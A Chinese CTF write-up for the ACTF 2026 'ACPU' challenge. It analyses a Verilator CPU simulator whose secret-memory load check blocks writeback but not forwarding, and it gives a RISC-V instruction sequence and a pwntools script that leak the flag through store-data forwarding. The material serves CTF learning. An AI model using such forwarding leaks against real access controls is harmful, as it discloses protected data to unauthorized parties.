ACPU
这题的Simulation是一个小型 CPU 仿真二进制文件,用 Verilator 将 SystemVerilog 转成 C++ 二进制模拟
先看懂其中核心函数逻辑:
函数:main
int main(int argc, char **argv) {
VerilatedContext *ctx = new VerilatedContext();
ctx->commandArgs(argc, argv);
VCPU *cpu = new VCPU(ctx, "Simulation");
// Verilator 的主循环:不断推进一个时隙,直到没有挂起事件。
while (!ctx->gotFinish()) {
cpu->eval_step();
if (cpu->eventsPending()) {
ctx->time(cpu->nextTimeSlot());
}
}
delete cpu;
delete ctx;
return 0;
}
函数:VCPU___024root___eval_initial__TOP(读取输入文件并初始化 cache/RAM 状态)
void eval_initial_top(Root *root) {
VL_READMEM_N(true, 32, 0x800, "rom_file.mem", root->mem_array_0x368);
VL_READMEM_N(true, 32, 0x100, "flag.mem", root->mem_array_0x63e8);
memset(root->public_cache_lines, 0, sizeof(root->public_cache_lines));
}
函数:VCPU___024root___nba_sequent__TOP__0(题目核心处理逻辑)
struct Signals {
uint32_t pc; // +0x00
uint32_t insn; // +0x04
uint8_t privileged; // +0x08
uint8_t bad_inst; // +0x09
uint8_t rs1; // +0x0a
uint8_t rs2; // +0x0b
uint32_t reg1; // +0x0c
uint32_t reg2; // +0x10
uint32_t op; // +0x14
uint32_t imm; // +0x18
uint32_t asel; // +0x1c
uint32_t bsel; // +0x20
uint32_t selector; // +0x24
uint8_t pcsel; // +0x28
uint8_t flag_zero; // +0x29
uint8_t flag_carry; // +0x2a
uint8_t cond; // +0x2b
uint32_t jimm; // +0x2c
uint8_t branch; // +0x30
uint8_t memr; // +0x31
uint8_t memw; // +0x32
uint32_t memt; // +0x34
uint8_t wback; // +0x38
uint8_t rd; // +0x39
uint64_t wdata; // +0x40
uint8_t sys_wback; // +0x48
uint16_t sys_wreg; // +0x4a
uint32_t sys_wdata; // +0x4c
}; // size = 0x58
static inline uint32_t sext8(uint32_t x) { return (uint32_t)(int32_t)(int8_t)x; }
static inline uint32_t sext16(uint32_t x) { return (uint32_t)(int32_t)(int16_t)x; }
static inline uint32_t extract_load_result(uint32_t raw, uint32_t memt, uint8_t shift) {
uint32_t v = raw >> shift;
switch (memt) {
case 0: return sext8(v); // LB
case 1: return sext16(v); // LH
case 2: return v; // LW
case 3: return v & 0xff; // LBU
case 4: return v & 0xffff; // LHU
default: return 0;
}
}
static inline void write_byte_lane(uint32_t *mem, uint32_t idx, uint8_t shift, uint8_t value) {
uint32_t mask = ~(0xffu << shift);
mem[idx] = (mem[idx] & mask) | ((uint32_t)value << shift);
}
// 具体子 case 是 add/sub/xor/or/not/shift/slt/sltu 一类。
static inline uint64_t execute_selector_result(uint32_t op, uint32_t a, uint32_t b) {
switch (op) {
case 0: return (uint64_t)(uint32_t)(a + b);
case 1: return (uint64_t)(uint32_t)(a - b);
case 2: return (uint64_t)(uint32_t)(a ^ b);
case 3: return (uint64_t)(uint32_t)(a | b);
case 4: return (uint64_t)(uint32_t)(~b);
case 5: return (uint64_t)(uint32_t)(b << (a & 0x1f));
case 8: return (uint64_t)(uint32_t)(b >> (a & 0x1f));
case 9: return (uint64_t)(uint32_t)(((int32_t)b) >> (a & 0x1f));
case 10: return (uint64_t)(uint32_t)(((int32_t)b < (int32_t)a) ? 1 : 0);
case 11: return (uint64_t)(uint32_t)((b < a) ? 1 : 0);
default: return 0;
}
}
//这函数就是 CPU 前端的大译码单元,把指令翻译成 pipeline 信号,由于内容过于复杂这里仅说明它的作用。
static inline void decode_frontend_and_build_controls(
void *root,
Signals &p0,
Signals &p1,
Signals &p2,
Signals &p3,
Signals &p4,
uint32_t fetched_insn,
uint64_t fetched_pc_and_insn)
{
// 它会做这些事:
// 1. 从 p3 / p4 / 当前 fetched_insn 里生成 rs1/rs2/imm/jimm/selector/op/memt/wback/rd/sys_*。
// 2. 维护 root+0x280/0x281/0x28d/0x28e/0x28f/0x290/0x291 这些控制位。
// 3. 维护 root+0x314/0x318/0x31c 这组前端/立即数临时槽位。
//
// 这里只保留它真实的输入输出边界。
(void)root;
(void)p0; (void)p1; (void)p2; (void)p3; (void)p4;
(void)fetched_insn; (void)fetched_pc_and_insn;
}
void step_core_logic(Root *root) {
Signals &p0 = *(Signals *)((char *)root + 0x018);
Signals &p1 = *(Signals *)((char *)root + 0x070);
Signals &p2 = *(Signals *)((char *)root + 0x0c8);
Signals &p3 = *(Signals *)((char *)root + 0x120);
Signals &p4 = *(Signals *)((char *)root + 0x178);
Signals &p5 = *(Signals *)((char *)root + 0x1d0);
Signals &p6 = *(Signals *)((char *)root + 0x228);
Signals next_p0 = p0;
Signals next_p1 = p1;
Signals next_p2 = p2;
Signals next_p3 = p3;
Signals next_p4 = p4;
Signals next_p5 = p5;
Signals next_p6 = p6;
uint32_t next_fetch_pc = root->field_0x320;
uint8_t next_delay_a = root->byte_0x294;
uint8_t next_delay_b = root->byte_0x293;
bool secret_access = false;
bool public_access = false;
bool illegal_load = false;
bool illegal_store = false;
bool cache_hit = false;
bool public_fill_line = false;
bool miss_active = false;
bool public_miss = false;
bool take_secret_write = false;
bool take_public_byte_write = false;
bool take_public_half_write = false;
bool take_public_word_write = false;
uint32_t raw_mem_word = 0;
uint32_t selected_public_word = 0;
uint32_t public_line_base = 0;
uint32_t public_word_index = 0;
uint16_t secret_index = 0;
uint16_t public_index_byte = 0;
uint16_t public_index_half = 0;
uint16_t public_index_word = 0;
uint8_t public_byte_shift = 0;
uint8_t public_half_shift = 0;
uint8_t public_word_shift = 0;
uint8_t public_byte_value = 0;
uint8_t public_half_value = 0;
uint8_t public_word_value = 0;
// ----------------------------------------------------------------
// 1. reset / power-on path
// ----------------------------------------------------------------
if (root->byte_0x14) {
root->field_0x32c = 0x20;
root->field_0x350 = 0x1000000010ULL;
root->field_0x308 = 0;
memset((char *)root + 0x2368, 0, 0x60);
memset((char *)root + 0x27740, 0, 0x80);
memset((char *)root + 0x277c0, 0, 0x40);
memset((char *)root + 0x27810, 0, 0x3e0);
next_p0 = {};
next_p1 = {};
next_p2 = {};
next_p3 = {};
next_p4 = {};
next_p5 = {};
next_p6 = {};
next_p0.memt = 4;
root->field_0x340 = 0;
root->field_0x34c = 0;
root->byte_0x28f = 0;
root->byte_0x290 = 0;
root->byte_0x291 = 0;
root->byte_0x292 = 0;
goto commit_all;
}
// ----------------------------------------------------------------
// 2. 上一拍 public fill 的 line 快照
// ----------------------------------------------------------------
if (root->byte_0x291) {
root->field_0x354 = 0x10;
public_line_base = (uint32_t)(root->qword_0x1c0 >> 10);
public_word_index = (uint32_t)((root->qword_0x1c0 >> 6) & 0xf);
memcpy((char *)root + 0x70, (char *)root + 0x27740, 0x40);
public_fill_line = true;
} else {
memset((char *)root + 0x70, 0, 0x40);
public_fill_line = false;
}
// ----------------------------------------------------------------
// 3. PC / cycle / delay 状态推进
// ----------------------------------------------------------------
if ((root->byte_0x13 & 1) == 0) {
next_fetch_pc += 4;
if (root->byte_0x1f8) {
next_fetch_pc = root->field_0x204;
}
}
root->field_0x308++;
if (root->byte_0x295) {
next_delay_a = 2;
next_delay_b = 1;
} else if (next_delay_b) {
if (next_delay_a) next_delay_a = (next_delay_a - 1) & 3;
else next_delay_b = 0;
}
// ----------------------------------------------------------------
// 4. public / secret 访存分流
// ----------------------------------------------------------------
{
uint32_t addr = (uint32_t)root->qword_0x1c0;
uint32_t region = addr >> 30;
if (((~root->mem_req_mask) & root->mem_req_enable) != 0) {
if (region == 0) {
public_access = true;
if (root->byte_0x28d & 0x2) {
public_byte_shift = 8;
public_index_byte = (addr >> 2);
public_byte_value = (uint8_t)(root->store_word >> 8);
if (public_index_byte <= 0x83d5) take_public_byte_write = true;
}
if (root->byte_0x28d & 0x4) {
public_half_shift = 16;
public_index_half = (addr >> 2);
public_half_value = (uint8_t)(root->store_word >> 16);
if (public_index_half <= 0x83d5) take_public_half_write = true;
}
if (root->byte_0x28d & 0x8) {
public_word_shift = (addr >> 24) & 0xff;
public_index_word = (addr >> 2) & 0xffff;
public_word_value = public_word_shift;
if (public_index_word <= 0x83d5) take_public_word_write = true;
}
if (root->load_enable_from_stage4) {
uint8_t line = (addr >> 6) & 0xf;
uint32_t line_tag = addr >> 10;
cache_hit =
(root->public_cache_tag[line] == line_tag) &&
root->public_cache_valid[line];
root->byte_0x292 = cache_hit;
if (cache_hit) {
selected_public_word = root->public_cache_data_0x27810[(line << 4) + ((addr >> 2) & 0xf)];
} else {
selected_public_word = root->public_mem_0x67e8[addr >> 2];
}
root->field_0x348 = selected_public_word;
}
} else if (region == 2) {
secret_access = true;
secret_index = (addr >> 2) & 0x3f;
raw_mem_word = root->secret_mem_0x63e8[secret_index];
root->field_0x340 = raw_mem_word;
illegal_load = root->load_enable_from_stage4 && !root->byte_0x290;
illegal_store = root->store_enable_from_stage4 && !root->byte_0x290;
if (root->secret_store_enable && !illegal_store) {
take_secret_write = true;
}
}
}
if (region == 0) {
raw_mem_word = root->field_0x348;
root->field_0x340 = raw_mem_word;
}
root->field_0x34c = extract_load_result(root->field_0x340, p4.memt, root->byte_0x28e);
if (illegal_load) root->byte_0x231 = 1;
}
// ----------------------------------------------------------------
// 5. 取指
// ----------------------------------------------------------------
if ((p0.memt != 4) || p0.bad_inst) {
root->field_0x30c = (uint64_t)0x13 << 32;
} else if ((root->byte_0x13 & 1) == 0) {
root->field_0x30c = next_fetch_pc;
root->field_0x310 = root->rom_words_0x368[(next_fetch_pc >> 2) & 0x7ff];
}
// ----------------------------------------------------------------
// 6. public fill / RAM 写回 side effect
// ----------------------------------------------------------------
if (public_fill_line) {
uint8_t line = ((uint32_t)root->qword_0x1c0 >> 6) & 0xf;
root->public_cache_valid[line] = 1;
root->public_cache_tag[line] = public_line_base;
}
if (take_secret_write) {
root->secret_mem_0x63e8[secret_index] = root->secret_store_value;
}
if (take_public_byte_write) {
write_byte_lane(root->public_mem_0x67e8, public_index_byte, public_byte_shift, public_byte_value);
}
if (take_public_half_write) {
write_byte_lane(root->public_mem_0x67e8, public_index_half, public_half_shift, public_half_value);
}
if (take_public_word_write) {
write_byte_lane(root->public_mem_0x67e8, public_index_word, public_word_shift, public_word_value);
}
// ----------------------------------------------------------------
// 7. 前端译码 / 立即数 / 控制信号生成
// ----------------------------------------------------------------
decode_frontend_and_build_controls(
root, next_p0, next_p1, next_p2, next_p3, next_p4,
root->field_0x310, root->field_0x30c);
// ----------------------------------------------------------------
// 8. p1 -> p2 推进,并补写 reg1 / imm
// ----------------------------------------------------------------
next_p2 = p1;
next_p2.reg1 = root->field_0x314;
next_p2.imm = root->field_0x31c;
// ----------------------------------------------------------------
// 9. ALU / execute 结果
// ----------------------------------------------------------------
root->field_0x360 = execute_selector_result(p3.op, p3.reg1, p3.reg2);
// ----------------------------------------------------------------
// 10. p3 的 execute result 写进 p5
// root+0x210/0x211/0x218/0x220/0x222/0x224 就是 p5.{wback,rd,wdata,sys_wback,sys_wreg,sys_wdata}
// ----------------------------------------------------------------
{
uint64_t exec64 = root->field_0x360;
uint32_t exec32 = (uint32_t)exec64;
uint8_t exec_hi = (uint32_t)(exec64 >> 32);
next_p5.rd = root->exec_rd_temp;
next_p5.wdata = exec64;
if (p3.sys_wback) {
next_p5.wback = (exec32 == 0);
next_p5.sys_wback = 1;
next_p5.sys_wreg = p3.imm & 0xfff;
next_p5.sys_wdata = root->exec_sys_value;
} else {
next_p5.wback = (p3.wback & 1);
next_p5.sys_wback = 0;
next_p5.sys_wreg = 0;
next_p5.sys_wdata = 0;
}
root->byte_0x28b = (exec32 == 0);
root->byte_0x28c = exec_hi;
root->byte_0x284 = root->cmp_result_kind;
}
// ----------------------------------------------------------------
// 11. p4 -> p6 推进
// ----------------------------------------------------------------
next_p6 = p4;
root->field_0x204 = root->branch_target_temp;
root->byte_0x1f8 = root->branch_taken_temp;
root->byte_0x1f9 = root->branch_zero_temp;
root->byte_0x1fa = root->branch_carry_temp;
// ----------------------------------------------------------------
// 12. 关键后半段:load 结果写进 p6.wdata
// ----------------------------------------------------------------
next_p6.wdata = root->field_0x34c;
// illegal_load 不会阻止数据进入 p6.wdata;
// 它拦的是最终写回
if (root->byte_0x28f || root->late_kill_flag) {
next_p6.wback = 0;
}
// secret_access / late kill 会把目的寄存器清掉
if (root->byte_0x290 || root->late_kill_flag) {
next_p6.rd = 0;
}
// 还会顺手清一组 side flag
if (root->byte_0x28f || root->late_kill_flag) {
root->byte_0x268 = 0;
}
// ----------------------------------------------------------------
// 13. 对外可观测状态落地
// ----------------------------------------------------------------
root->byte_0x290 = secret_access;
root->byte_0x291 = public_fill_line;
root->byte_0x292 = cache_hit;
root->byte_illegal_load = illegal_load;
root->byte_illegal_store = illegal_store;
root->byte_public_access = public_access;
root->byte_miss_active = miss_active;
root->byte_public_miss = public_miss;
root->field_public_line_base = public_line_base;
root->field_public_word_index = public_word_index;
commit_all:
// ----------------------------------------------------------------
// 14. 统一提交回 root
// ----------------------------------------------------------------
p0 = next_p0;
p1 = next_p1;
p2 = next_p2;
p3 = next_p3;
p4 = next_p4;
p5 = next_p5;
p6 = next_p6;
root->field_0x320 = next_fetch_pc;
root->byte_0x294 = next_delay_a;
root->byte_0x293 = next_delay_b;
}
这题的外层run.py的逻辑就是把用户输入的base64内容解码从 rom_file.mem的0x100位置写入,最大len为0x800,并且把flag.txt的内容存入 flag.mem,然后运行Simulation。
从VCPU___024root___eval_initial__TOP里我们可以看到,初始化时会把flag.mem读进root + 0x63e8数组,在VCPU___024root___nba_sequent__TOP__0里对应的是secret_mem_0x63e8,会把rom_file.mem读进root->mem_array_0x368,在VCPU___024root___nba_sequent__TOP__0里对应的是rom_words_0x368。
也就是flag被存在Secret RAM里,我们要想办法从里面读取数据。
所以我们先看VCPU___024root___nba_sequent__TOP__0里的读取逻辑,也就是"4.public / secret 访存分流"那部分
// ----------------------------------------------------------------
// 4. public / secret 访存分流
// ----------------------------------------------------------------
{
uint32_t addr = (uint32_t)root->qword_0x1c0;
uint32_t region = addr >> 30;
if (((~root->mem_req_mask) & root->mem_req_enable) != 0) {
......
else if (region == 2) {
secret_access = true;
secret_index = (addr >> 2) & 0x3f;
raw_mem_word = root->secret_mem_0x63e8[secret_index];
root->field_0x340 = raw_mem_word;
illegal_load = root->load_enable_from_stage4 && !root->byte_0x290;
illegal_store = root->store_enable_from_stage4 && !root->byte_0x290;
if (root->secret_store_enable && !illegal_store) {
take_secret_write = true;
}
}
}
root->field_0x34c = extract_load_result(root->field_0x340, p4.memt, root->byte_0x28e);
if (illegal_load) root->byte_0x231 = 1;
}
if ((~root->mem_req_mask) & root->mem_req_enable)
root->mem_req_enable→ 内存请求有效位(load/store 请求是否发出)root->mem_req_mask→ 内存请求屏蔽位(屏蔽某些请求)~root->mem_req_mask→ 取反,得到允许的 bit 位- 条件成立:
- 同时满足:请求有效,并且没有被屏蔽
uint32_t addr = root->cached_public_addr_0x1c0;
取出这次访存地址
uint32_t region = addr >> 30; if (region == 2)
这里是用地址高位判断访问区域:
- region == 0:public 区
- region == 2:secret 区
secret_index = (addr >> 2) & 0x3f;
- 地址先右移 2 位,代表按word访问(因为 CPU 内存是按word(32-bit对齐访问,一个word = 4字节所以地址右移 2 位,把 byte 地址转换成 word 地址)
- 再取低 6 位,说明secret 区一共按64 个word 编址(索引范围 0~63)
raw_mem_word = root->secret_mem_0x63e8[secret_index];
- 按刚算出来的 secret_index
- 从 secret_mem_0x63e8 里读一个 32-bit word
- 放进 raw_mem_word
这一步已经把secrect RAM的内容取出来了
root->field_0x340 = raw_mem_word;
把secrect RAM的内容转移到 root->field_0x340
illegal_load = root->load_enable_from_stage4 && !root->byte_0x290;
这句是在判断:这次 secret 访问是不是非法的 load。
- root->load_enable_from_stage4
表示当前这拍的这次 secret 访存,其实是一个 load - !root->byte_0x290
表示当前不具备访问 secret 的权限
所以这句的含义就是:如果当前是在做一次 load,而且当前没有 secret 权限,那么这次就是 illegal load。
illegal_store = root->store_enable_from_stage4 && !root->byte_0x290;
这句和上一句完全类似,只不过它判断的是:这次 secret 访问是不是非法的 store。
也就是:
- 如果这次是 store
- 并且没有 secret 权限
- 那就把 illegal_store 置真
if (root->secret_store_enable && !illegal_store) {
意思是:
- 如果当前这次操作本来就打算往 secret RAM 写
- 并且这次写不是非法的
那就允许它进入真正的写回阶段。
take_secret_write = true;
这句不是立刻写 RAM,意思是:
- 先记一个“待写回”的标志
- 稍后在统一提交阶段,才真正把值写进 secret_mem_0x63e8
root->field_0x34c = extract_load_result(root->field_0x340, p4.memt, root->byte_0x28e);
意思是:
- 不管前面 raw_mem_word 是从 public 还是 secret 来的
- 现在都统一拿 root->field_0x340
- 根据 load 类型 p4.memt
- 再根据字内偏移 root->byte_0x28e
- 生成最终的 load 结果
- 存进 root->field_0x34c
也就是:
- 0x340 是原始 32-bit word
- 0x34c 是 CPU 真正整理好的 load 返回值
if (illegal_load) root->byte_0x231 = 1;
这句是在记录一个异常/违规标志。
意思是:
- 如果刚才判定这是一次非法 load
- 就把 root->byte_0x231 置 1
也就是给后面的异常处理/kill 逻辑打一个标记:这拍发生了 illegal load。
我们现在看 extract_load_result()是怎么处理的:
static inline uint32_t extract_load_result(uint32_t raw, uint32_t memt, uint8_t shift) {
uint32_t v = raw >> shift;
switch (memt) {
case 0: return sext8(v); // LB
case 1: return sext16(v); // LH
case 2: return v; // LW
case 3: return v & 0xff; // LBU
case 4: return v & 0xffff; // LHU
default: return 0;
}
}
第一步:
uint32_t v = raw >> shift;
这一步是在做“字内选字节/半字”。
比如一个 raw_mem_word 是:
[b3 b2 b1 b0]
如果:
shift = 0,取最低字节开始shift = 8,相当于把第二个字节移到最低位shift = 16,取第三个字节shift = 24,取第四个字节
所以它是在从一个 32-bit word 里抽真正要load的那一部分。
第二步:按 load 类型解释
memt 决定这是哪种 load:
0->LB1->LH2->LW3->LBU4->LHU
对应行为:
case 0: return sext8(v);
取低 8 位,并做符号扩展
case 1: return sext16(v);
取低 16 位,并做符号扩展
case 2: return v;
直接返回 32 位 word
case 3: return v & 0xff;
取低 8 位,但不符号扩展
case 4: return v & 0xffff;
取低 16 位,但不符号扩展
所以如果题目用的是 lw,那这一层几乎没有损失。
我们继续追踪field_0x34c:
// ----------------------------------------------------------------
// 12. 关键后半段:load 结果写进 p6.wdata
// ----------------------------------------------------------------
next_p6.wdata = root->field_0x34c;
// illegal_load 不会阻止数据进入 p6.wdata;
// 它拦的是最终写回
if (root->byte_0x28f || root->late_kill_flag) {
next_p6.wback = 0;
}
// secret_access / late kill 会把目的寄存器清掉
if (root->byte_0x290 || root->late_kill_flag) {
next_p6.rd = 0;
}
// 还会顺手清一组 side flag
if (root->byte_0x28f || root->late_kill_flag) {
root->byte_0x268 = 0;
}
next_p6.wdata = root->field_0x34c;
意思是:
- field_0x34c 是整理好的 load 结果
- 现在它被放进 p6.wdata
- p6 是最后一级的那组 Signals
也就是说,到这里为止,secret 数据已经不是停留在 memory 子系统里,而是已经进入写回级数据槽了。
if (root->byte_0x28f || root->late_kill_flag) { next_p6.wback = 0; }
意思是:
- 如果发生了 illegal_load 这类 kill 条件
- 那就把 p6.wback 清零
wback 是一个是否要写入的标记位,代表最终要不要真的把 wdata 写进寄存器堆,清零就代表:
- wdata 还在
- 但“不允许正式提交”
if (root->byte_0x290 || root->late_kill_flag) { next_p6.rd = 0; }
意思是:
- 如果是 secret 访问或者进入某个 kill 状态
- 那就把目标寄存器号清成 0
所以这句是在进一步保证:
这次非法得到的 load 结果,不会以“正常寄存器写回”的形式保留下来。
if (root->byte_0x28f || root->late_kill_flag) { root->byte_0x268 = 0; }
条件如上,也是非法时清空,对解题不太重要
我们现在可以总结一下了:
secret RAM的内容可以被读出来存进 p6.wdata,但是最后 wback 被清零,rd 也被抹掉
也就是:
- 数据路径是通的
- 只是最终提交被拦了
那下一步该怎么做呢,我们要先了解一下CPU Forwarding:
假设一个简单的 5 级流水线 CPU(Fetch → Decode → Execute → Memory → Writeback),有这样两条指令:
1. add r1, r2, r3 ; r1 = r2 + r3
2. sub r4, r1, r5 ; r4 = r1 - r5
- 问题:第二条指令需要用到
r1的值,但r1还没写回到寄存器堆(Writeback 阶段还没到) - 直接从寄存器堆读会得到旧值 → 数据冒险
Forwarding 的核心思路是:
- 不用等寄存器写回
- 直接从 pipeline 中 上一条指令的中间阶段(ALU 输出 / memory 输出) 拿数据给下一条指令
举例:
EX stage of add r1 = ALU_out
EX stage of sub r4 = get r1 from previous EX stage instead of regfile
- 这样第二条指令就能立即拿到正确的
r1值,而不需要停顿
Forwarding 的典型路径:
| 来源阶段 | 目的阶段 | 说明 |
|---|---|---|
| EX / MEM | EX | ALU 结果直接给下一条指令的 ALU 使用 |
| MEM | EX | Load 结果给下一条指令 ALU 使用(load-use hazard) |
| MEM / WB | MEM | 写回数据给 memory store 使用 |
我们如果这样操作:
words += li32(5, 0x80000000)
words.append(lw(7, 0, 5))
words.append(sw(7, 0, 0))
words.append(lw(10, 0, 0))
words += li32(6, 0x2000)
words.append(jalr(0, 0, 6))
对应的汇编逻辑是:
li32 t0, 0x80000000
lw t2, 0(t0)
sw t2, 0(x0)
lw a0, 0(x0)
li32 t1, 0x2000
jalr x0, 0(t1)
1. 0x80000000 是什么:
这是 secret 区的基址。
我们前面已经从 step_core_logic 里确认过,访存时会先做:
region = addr >> 30;
然后:
region == 0:public 区region == 2:secret 区
而:
0x80000000 >> 30 = 2
因为 0x80000000 的最高两位是 10。
所以把地址设成 0x80000000,就是在访问 secret RAM 的第 0 个 word。
也就是 flag 开头那 4 个字节所在的位置。
2. 5、7、10 代表什么:
这些是寄存器编号。
RISC-V 有 32 个通用寄存器:
x0到x31
其中一些有 ABI 别名,常用的是:
x5 = t0x6 = t1x7 = t2x10 = a0
特殊地,x0 是RISC-V里永远为 0 的寄存器,写进去的值会被丢掉
3.具体流程:
按顺序看:
第一步
li32 t0, 0x80000000
把 t0 设成 secret 基址。
所以:
t0 = 0x80000000
第二步
lw t2, 0(t0)
从 0x80000000 读一个 32-bit word。
这里实际读到的是 flag 的前 4 个字节,也就是:
'A' 'C' 'T' 'F'
按小端拼成 32 位数就是:
0x46544341
但是这次 load 属于非法 secret load,所以:
- 数据内部其实已经读出来了
- 可最后不会正常提交到
t2/x7
所以最后可以看到:
x7 = 0x00000000
第三步
sw t2, 0(x0)
它按正常语义是:
*(uint32_t *)0x0 = t2
这里的 t2 不是从寄存器堆里慢慢等出来的,而是 store-data 走了 forwarding。
也就是说:
- 前一条
lw虽然没最终写回x7 - 但它的结果已经在流水线内部
sw紧跟着来取 store-data 时,直接从 forwarding 拿到了那份 secret word
于是 public 地址 0x0 被写成了:
0x46544341
第四步
lw a0, 0(x0)
这次是从 public 地址 0x0 正常读。
所以它不会触发 secret 权限检查,能合法读回:
x10 = 0x46544341
第五步
li32 t1, 0x2000
jalr x0, 0(t1)
x0无法写入,这里表示不保存返回地址到寄存器,直接跳到 0x2000 正常结束,让模拟器把寄存器打出来,这时候x10里面就是flag的前4字节内容了。
这里0x2000这个结束地址可以通过VCPU___024root___eval_initial__TOP里的VL_READMEM_N(true, 32, 0x800, "rom_file.mem", root->mem_array_0x368);看出来,整个ROM的大小为0x800 * 4 = 0x2000 bytes,0x2000大概率是结束指令,实际测试可以发现确实是。
然后就是循环四字节取遍flag就行了。
EXP:
from pwn import *
from zenpwnpy import *
context.terminal = ['tmux', 'splitw', '-h']
target = ''
file_name = './Simulation'
elf = ELF(file_name)
context.binary = elf
context.gdb_binary = "pwndbg"
gdb_ = 1 if ('gdb' in sys.argv) else 0
switch = 1 if ('remote' in sys.argv) else 0
debug = 0 if ('deoff' in sys.argv) else 1
error = 1 if ('error' in sys.argv) else 0
if debug:
context(log_level='debug')
if error:
context(log_level='error')
bps = [
# 0x1234,
# 'main',
# (0xe3b31, 'libc'),
# ('system', 'libc')
]
gdb_cmd = ''
if gdb_ and switch == 0:
gdb_cmd += "set breakpoint pending on\n"
for b in bps:
if isinstance(b, int):
gdb_cmd += f"breakrva {hex(b)}\n"
elif isinstance(b, str):
gdb_cmd += f"b {b}\n"
gdb_cmd += "c\n"
if switch:
parts = target.replace(':', ' ').split()
host = parts[-2]
port = int(parts[-1])
use_ssl = '--ssl' in parts
p = remote(host, port, ssl=use_ssl, sni=host if use_ssl else None)
elif gdb_:
p = gdb.debug(file_name, gdbscript=gdb_cmd, aslr=True)
else:
path = "/home/zenduk/ctf/ACTF 2026/ACPU/attachment/bin/run.py"
workspace = "/home/zenduk/ctf/ACTF 2026/ACPU/attachment/bin"
p = process(["python3", path],cwd=workspace)
def s(data): return p.send(data)
def sa(delim, data): return p.sendafter(delim, data)
def sl(data): return p.sendline(data)
def sla(delim, data): return p.sendlineafter(delim, data)
def r(numb=4096): return p.recv(numb)
def ru(delim, drop=True):return p.recvuntil(delim, drop)
def rl(bool): return p.recvline(keepends=bool)
def ra(t=None): return p.recvall(timeout=t)
def rn(numb): return p.recvn(numb)
def cl(): return p.close()
def it(): return p.interactive()
def uc64(data): return u64(data.rjust(8, b'\x00'))
def uu64(data): return u64(data.ljust(8, b'\x00'))
def addr(off): return lg(hex(off), (ret := elf.address + off)) or ret
def cb(data): return data if isinstance(data, bytes) else str(data).encode()
def lg(name, data): return log.success(name + ': ' + (hex(data) if isinstance(data, int) else data.decode(errors='ignore') if isinstance(data, bytes) else str(data)))
def menu(idx, pmt=b'>'): return sla(pmt, str(idx).encode())
def bl(address): return (address).to_bytes(3, 'big')
def bt(*values): return bytes([v & 0xff for v in values])
def ntpie(leak, offset, name='PIE'): return setattr(elf, 'address', leak - (elf.sym[offset] if isinstance(offset, str) else offset)) or lg(name, elf.address)
def base(val, binary=elf): return binary.address + val
def fill(num, content=b'A'): return (content.encode() if isinstance(content, str) else content) * num
def se(s): return lg(s if isinstance(s, str) else f"bytes: {s.hex()}", (addr := next(elf.search(s if isinstance(s, bytes) else s.encode())))) or addr
def shn(target, current_printed): return [((target & 0xffff) - current_printed) % 0x10000, current_printed + (((target & 0xffff) - current_printed) % 0x10000)]
def shhn(target, current_printed): return [((target & 0xff) - current_printed) % 0x100, current_printed + (((target & 0xff) - current_printed) % 0x100)]
_rop_cache = {}
def gg(s):
target = elf
if target not in _rop_cache:
_rop_cache[target] = ROP(target)
rop = _rop_cache[target]
instrs = [x.strip() for x in s.split(';')]
if (gadget := rop.find_gadget(instrs)):
lg(s, gadget.address)
return gadget.address
else:
raise ValueError(f"[-] Critical: Gadget not found: {s}")
def ga(delim=b'|', name='Leak', data=None):
target_data = p.recv(data) if isinstance(data, int) else (data if data else ru(delim))
if isinstance(target_data, str):
target_data = target_data.encode()
hex_list = re.findall(b'0x[0-9a-fA-F]+', target_data)
return [lg(f'{name}[{i}]', x) or x for i, x in enumerate([int(a, 16)for a in hex_list])]
#################################################################################
words = []
words += li32(5, 0x80000000)
for i in range(16):
words.append(lw(7, i * 4, 5))
words.append(sw(7, 0, 0))
words.append(lw(10 + i, 0, 0))
words += li32(6, 0x2000)
words.append(jalr(0, 0, 6))
payload = pack_words(words)
sla(b"give me your code:\n", base64.b64encode(payload))
out = ru(b"give me your code:\n").decode(errors="ignore")
regs = {}
for m in re.finditer(r"x(\d+)\s*=\s*0x([0-9a-fA-F]{8})", out):
regs[int(m.group(1))] = int(m.group(2), 16)
leak = b""
for reg in range(10, 26):
leak += regs[reg].to_bytes(4, "little")
print(leak)
it()
题目链接:CTF-Writeups/ACTF 2026/ACPU at main · Zenquiem/CTF-Writeups